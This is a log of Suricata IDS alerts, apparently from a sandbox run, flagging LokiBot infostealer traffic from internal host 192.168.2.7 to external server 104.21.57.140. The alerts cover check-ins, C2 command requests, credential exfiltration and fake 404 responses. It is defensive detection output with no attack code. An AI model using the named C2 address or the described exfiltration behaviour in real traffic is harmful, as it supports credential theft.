Source: Network traffic	Suricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.7:49703 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49722 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49796 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49828 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49796 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49723 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49867 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49867 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49758 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49860 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49764 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49836 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49764 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49860 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49875 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49765 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49746 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49891 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49771 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49891 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49860 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49828 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49828 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49790 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49790 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49790 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49771 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49781 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49771 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49781 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49710 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49710 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49836 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49836 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49796 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49906 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49722 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.57.140:80 -> 192.168.2.7:49710
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.57.140:80 -> 192.168.2.7:49752
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49723 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49891 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49891 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49764 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49790 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49790 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49860 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49764 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.57.140:80 -> 192.168.2.7:49891
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49875 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49919 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49919 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49919 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.57.140:80 -> 192.168.2.7:49867
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49836 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49836 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49803 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49758 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49919 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49860 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.57.140:80 -> 192.168.2.7:49834
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49716 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.57.140:80 -> 192.168.2.7:49836
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49906 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.57.140:80 -> 192.168.2.7:49790
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.57.140:80 -> 192.168.2.7:49746
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.57.140:80 -> 192.168.2.7:49781
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49716 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49803 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49723 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.57.140:80 -> 192.168.2.7:49875
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49723 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49828 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49828 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49850 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49906 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49796 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49929 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49796 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.57.140:80 -> 192.168.2.7:49828
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49716 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49765 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49919 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.57.140:80 -> 192.168.2.7:49737
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49850 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.57.140:80 -> 192.168.2.7:49722
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49929 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.57.140:80 -> 192.168.2.7:49765
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49809 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.57.140:80 -> 192.168.2.7:49723
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49850 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49758 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49764 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.57.140:80 -> 192.168.2.7:49716
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.57.140:80 -> 192.168.2.7:49860
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49809 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49809 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49929 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49925 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49925 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49925 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49850 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.57.140:80 -> 192.168.2.7:49919
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49730 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49906 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49906 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49850 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49709 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49709 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49709 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49730 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49730 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.57.140:80 -> 192.168.2.7:49758
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.57.140:80 -> 192.168.2.7:49796
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.57.140:80 -> 192.168.2.7:49764
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49925 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49882 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49882 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49882 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.57.140:80 -> 192.168.2.7:49850
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.57.140:80 -> 192.168.2.7:49771
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.57.140:80 -> 192.168.2.7:49906
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49925 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.57.140:80 -> 192.168.2.7:49925
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49730 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49730 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49943 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49943 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49943 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49929 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49943 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49929 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49841 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49841 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.57.140:80 -> 192.168.2.7:49929
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49777 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49882 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49943 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49777 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49777 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49882 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49841 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.7:49709 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49809 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49809 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49947 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49961 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.57.140:80 -> 192.168.2.7:49882
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49800 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49800 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49800 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49939 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49841 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49841 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.57.140:80 -> 192.168.2.7:49809
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49895 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49800 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49854 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49895 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49854 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49895 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49854 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49947 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49777 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49777 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49961 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49800 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49956 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.57.140:80 -> 192.168.2.7:49841
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49956 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49956 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49939 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49939 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49854 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.57.140:80 -> 192.168.2.7:49777
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49854 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49992 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49992 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49947 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49895 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49895 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49988 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49961 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49988 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49947 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49988 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49992 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49815 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49956 -> 104.21.57.140:80
